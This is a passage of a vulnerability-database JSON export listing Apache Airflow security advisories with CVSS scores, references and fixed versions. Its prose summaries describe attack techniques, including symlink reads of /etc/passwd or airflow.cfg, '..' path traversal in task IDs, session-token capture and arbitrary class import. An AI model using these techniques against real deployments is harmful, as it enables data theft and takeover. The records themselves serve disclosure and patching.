"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:41:12Z/" } ], "url": "https://github.com/apache/airflow/pull/62046" }, { "reference_url": "https://lists.apache.org/thread/dwzf62qg9z8wvfsjknpfd8bvtwghd49s", "reference_id": "dwzf62qg9z8wvfsjknpfd8bvtwghd49s", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-17T15:41:12Z/" } ], "url": "https://lists.apache.org/thread/dwzf62qg9z8wvfsjknpfd8bvtwghd49s" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/91427?format=api", "purl": "pkg:pypi/apache-airflow@3.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-6vv8-kr7f-mubf" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8" } ], "aliases": [ "BIT-airflow-2026-28563", "CVE-2026-28563", "GHSA-x3fv-96qh-67m7", "PYSEC-2026-15" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bva2-dpg3-m7hv" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/68064?format=api", "vulnerability_id": "VCID-es5x-ee29-6ue8", "summary": "The authenticated /ui/dags endpoint did not enforce per-DAG access control on embedded Human-in-the-Loop (HITL) and TaskInstance records: a logged-in Airflow user with read access to at least one DAG could retrieve HITL prompts (including their request parameters) and full TaskInstance details for DAGs outside their authorized scope. Because HITL prompts and TaskInstance fields routinely carry operator parameters and free-form context attached to a task, the leak widens visibility of DAG-run data beyond the intended per-DAG RBAC boundary for every authenticated user.\n\nUsers are recommended to upgrade to version 3.2.1 , which fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38743", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20588", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00065", "scoring_system": "epss", "scoring_elements": "0.20412", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-38743" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/apache/airflow/commit/fed4921098d51fd3ec17b7f5cff80f6c36fd05e2", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow/commit/fed4921098d51fd3ec17b7f5cff80f6c36fd05e2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38743", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-38743" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/24/3", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/24/3" }, { "reference_url": "https://github.com/apache/airflow/pull/64822", "reference_id": "64822", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:21:58Z/" } ], "url": "https://github.com/apache/airflow/pull/64822" }, { "reference_url": "https://github.com/advisories/GHSA-p3v3-229h-mc63", "reference_id": "GHSA-p3v3-229h-mc63", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-p3v3-229h-mc63" }, { "reference_url": "https://lists.apache.org/thread/sk2wj0x48o8qb4p7c47gvnhjbm0mg396", "reference_id": "sk2wj0x48o8qb4p7c47gvnhjbm0mg396", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:21:58Z/" } ], "url": "https://lists.apache.org/thread/sk2wj0x48o8qb4p7c47gvnhjbm0mg396" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93941?format=api", "purl": "pkg:pypi/apache-airflow@3.2.1rc1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-7nmp-wvjt-5qcd" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-r4gm-ygr6-4ffs" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-y78u-y824-afc4" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.1rc1" } ], "aliases": [ "CVE-2026-38743", "GHSA-p3v3-229h-mc63" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-es5x-ee29-6ue8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69290?format=api", "vulnerability_id": "VCID-f41w-9d6d-wbgf", "summary": "Apache Airflow versions 3.1.0 through 3.1.7 session token (_token) in cookies is set to path=/ regardless of the configured [webserver] base_url or [api] base_url.\nThis allows any application co-hosted under the same domain to capture valid Airflow session tokens from HTTP request headers, allowing full session takeover without attacking Airflow itself.\n\nUsers are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28779", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.0931", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00031", "scoring_system": "epss", "scoring_elements": "0.09362", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-28779" }, { "reference_url": "https://github.com/advisories/GHSA-4fhm-p86v-hwpx", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4fhm-p86v-hwpx" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-16.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/pypa/advisory-database/tree/main/vulns/apache-airflow/PYSEC-2026-16.yaml" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28779", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28779" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/03/17/3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/03/17/3" }, { "reference_url": "https://github.com/apache/airflow/pull/62771", "reference_id": "62771", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-17T13:44:27Z/" } ], "url": "https://github.com/apache/airflow/pull/62771" }, { "reference_url": "https://lists.apache.org/thread/r4n5znb8mcq14wo9v8ndml36nxlksdqb", "reference_id": "r4n5znb8mcq14wo9v8ndml36nxlksdqb", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-17T13:44:27Z/" } ], "url": "https://lists.apache.org/thread/r4n5znb8mcq14wo9v8ndml36nxlksdqb" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/91427?format=api", "purl": "pkg:pypi/apache-airflow@3.1.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-6vv8-kr7f-mubf" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.8" } ], "aliases": [ "BIT-airflow-2026-28779", "CVE-2026-28779", "GHSA-4fhm-p86v-hwpx", "PYSEC-2026-16" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f41w-9d6d-wbgf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83883?format=api", "vulnerability_id": "VCID-f5rh-fhtd-wyau", "summary": "A Dag author could either (a) create a symlink under their task's log directory pointing to an arbitrary file readable by the API server process (read-path attack — e.g. `/etc/passwd` or `airflow.cfg`) or (b) supply a `task_id` containing `..` sequences accepted by the Task SDK's `KEY_REGEX` (write-path attack), and in both cases the FileTaskHandler resolves the log path outside the configured `base_log_folder`, leaking or overwriting arbitrary files. Only affects deployments where the worker log folder is shared with the API server. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. As a defense-in-depth mitigation, deploy the worker and API server with separate log volumes so that worker-controlled paths cannot reach the API server's filesystem.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40861", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.27712", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00103", "scoring_system": "epss", "scoring_elements": "0.27913", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-40861" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/05/31/1", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], "url": "http://www.openwall.com/lists/oss-security/2026/05/31/1" }, { "reference_url": "https://github.com/apache/airflow/pull/65325", "reference_id": "65325", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:33:03Z/" } ], "url": "https://github.com/apache/airflow/pull/65325" }, { "reference_url": "https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl", "reference_id": "823334db2559xjlwt59gpzjz47thnscl", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-06-02T16:33:03Z/" } ], "url": "https://lists.apache.org/thread/823334db2559xjlwt59gpzjz47thnscl" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-40861", "CVE-2026-40861", "PYSEC-2026-181" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-f5rh-fhtd-wyau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/83003?format=api", "vulnerability_id": "VCID-gbn8-8y8d-gkgw", "summary": "Apache Airflow versions 3.0.0 - 3.1.7, has vulnerability that allows authenticated UI users with permission to one or more specific Dags to view import errors generated by other Dags they did not have access to. \n\nUsers are advised to upgrade to 3.1.7 or later, which resolves this issue", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24098", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03769", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.0375", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-24098" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/02/09/3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/02/09/3" }, { "reference_url": "https://github.com/apache/airflow/pull/60801", "reference_id": "60801", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-09T15:28:52Z/" } ], "url": "https://github.com/apache/airflow/pull/60801" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24098", "reference_id": "CVE-2026-24098", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24098" }, { "reference_url": "https://github.com/advisories/GHSA-5g2w-9f8g-g5q7", "reference_id": "GHSA-5g2w-9f8g-g5q7", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5g2w-9f8g-g5q7" }, { "reference_url": "https://lists.apache.org/thread/nx96435v77xdst7ls5lk57kqvqyj095x", "reference_id": "nx96435v77xdst7ls5lk57kqvqyj095x", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-09T15:28:52Z/" } ], "url": "https://lists.apache.org/thread/nx96435v77xdst7ls5lk57kqvqyj095x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38937?format=api", "purl": "pkg:pypi/apache-airflow@3.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2j7p-89b9-t7e8" }, { "vulnerability": "VCID-4n4v-jv1f-1bgk" }, { "vulnerability": "VCID-5r2q-cc18-v7cx" }, { "vulnerability": "VCID-7q3b-su3j-y7b4" }, { "vulnerability": "VCID-8aa5-hyy9-e3f1" }, { "vulnerability": "VCID-9y7c-yxq4-f7ha" }, { "vulnerability": "VCID-ap8j-6689-kfgd" }, { "vulnerability": "VCID-bkwd-x3qh-57ga" }, { "vulnerability": "VCID-bva2-dpg3-m7hv" }, { "vulnerability": "VCID-es5x-ee29-6ue8" }, { "vulnerability": "VCID-f41w-9d6d-wbgf" }, { "vulnerability": "VCID-f5rh-fhtd-wyau" }, { "vulnerability": "VCID-h4r7-k7z1-6kgg" }, { "vulnerability": "VCID-nz83-fzzb-5ucs" }, { "vulnerability": "VCID-szqt-j7av-dqde" }, { "vulnerability": "VCID-tbn8-rdjn-nban" }, { "vulnerability": "VCID-ttb5-juj4-uugt" }, { "vulnerability": "VCID-tx59-fvt4-mbfj" }, { "vulnerability": "VCID-typh-t13h-w3g1" }, { "vulnerability": "VCID-vnaq-tba8-ykag" }, { "vulnerability": "VCID-vxqr-wyq5-6yge" }, { "vulnerability": "VCID-xga6-ksvc-9yhf" }, { "vulnerability": "VCID-yvkr-2un4-cyfg" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.1.7" } ], "aliases": [ "BIT-airflow-2026-24098", "CVE-2026-24098", "GHSA-5g2w-9f8g-g5q7", "PYSEC-2026-12" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gbn8-8y8d-gkgw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/69986?format=api", "vulnerability_id": "VCID-h4r7-k7z1-6kgg", "summary": "Apache Airflow's scheduler-side deadline-reference decoder (`SerializedCustomReference.deserialize_reference`) imported and dispatched arbitrary class paths drawn from DAG-author-controlled serialized state without an allowlist or plugin-registry gate. A DAG author whose code reaches the scheduler — the default on single-host deployments where the DAG bundle is importable from the scheduler process — could embed a custom `DeadlineReference` whose serialized form named an attacker-controlled module path, causing the scheduler to `import_string(...)` and instantiate that class with a live SQLAlchemy session attached. Affects deployments where DAG-author code is less trusted than the scheduler process. Users are advised to upgrade to `apache-airflow` 3.2.2 or later.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45360", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24797", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24997", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-45360" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/05/31/12", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "url": "http://www.openwall.com/lists/oss-security/2026/05/31/12" }, { "reference_url": "https://github.com/apache/airflow/pull/66737", "reference_id": "66737", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-06-02T15:48:16Z/" } ], "url": "https://github.com/apache/airflow/pull/66737" }, { "reference_url": "https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83", "reference_id": "q227dghjwgfz8xsxrf2pwpz4wk43zm83", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-06-02T15:48:16Z/" } ], "url": "https://lists.apache.org/thread/q227dghjwgfz8xsxrf2pwpz4wk43zm83" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/93948?format=api", "purl": "pkg:pypi/apache-airflow@3.2.2", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/apache-airflow@3.2.2" } ], "aliases": [ "BIT-airflow-2026-45360", "CVE-2026-45360", "PYSEC-2026-186" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-h4r7-k7z1-6kgg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/65906?format=api", "vulnerability_id": "VCID-nz83-fzzb-5ucs", "summary": "The `access_key` and `connection_string` connection properties were not marked as sensitive names in secrets masker. This means that user with read permission could see the values in Connection UI, as well as when Connection was accidentaly logged to logs, those values could be seen in the logs. Azure Service Bus used those properties to store sensitive values. Possibly other providers could be also affected if they used the same fields to store sensitive data.\n\nIf you used Azure Service Bus connection with those values set or if you have other connections with those values storing sensitve values, you should upgrade Airflow to 3.1.8", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25219", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0766", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07695", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25219" }, { "reference_url": "https://github.com/apache/airflow", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/apache/airflow" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25219", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25219" }, { "reference_url": "http://www.openwall.com/lists/oss-security/2026/04/15/3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://www.openwall.com/lists/oss-security/2026/04/15/3" }, { "reference_url": "https://github.com/apache/airflow/pull/61580", "reference_id": "61580", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:53:19Z/" } ], "url": "https://github.com/apache/airflow/pull/61580" }, { "reference_url": "https://github.com/apache/airflow/pull/61582", "reference_id": "61582", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-15T19:53:19Z/" } ], "url": "https://github.com/apache/airflow/pull/61582" }, { "reference_url": "https://github.com/advisories/GHSA-4g48-54q2-fg7q", "reference_id": "GHSA-4g48-54q2-fg7q", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4g48-54q2-fg7q" }, { "reference_url": "https://lists.apache.org/thread/t4dlmqkn0njz4chk3g7mdgzb96y4ttqh", "reference_id": "t4dlmqkn0njz4chk3g7mdgzb96y4ttqh", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": 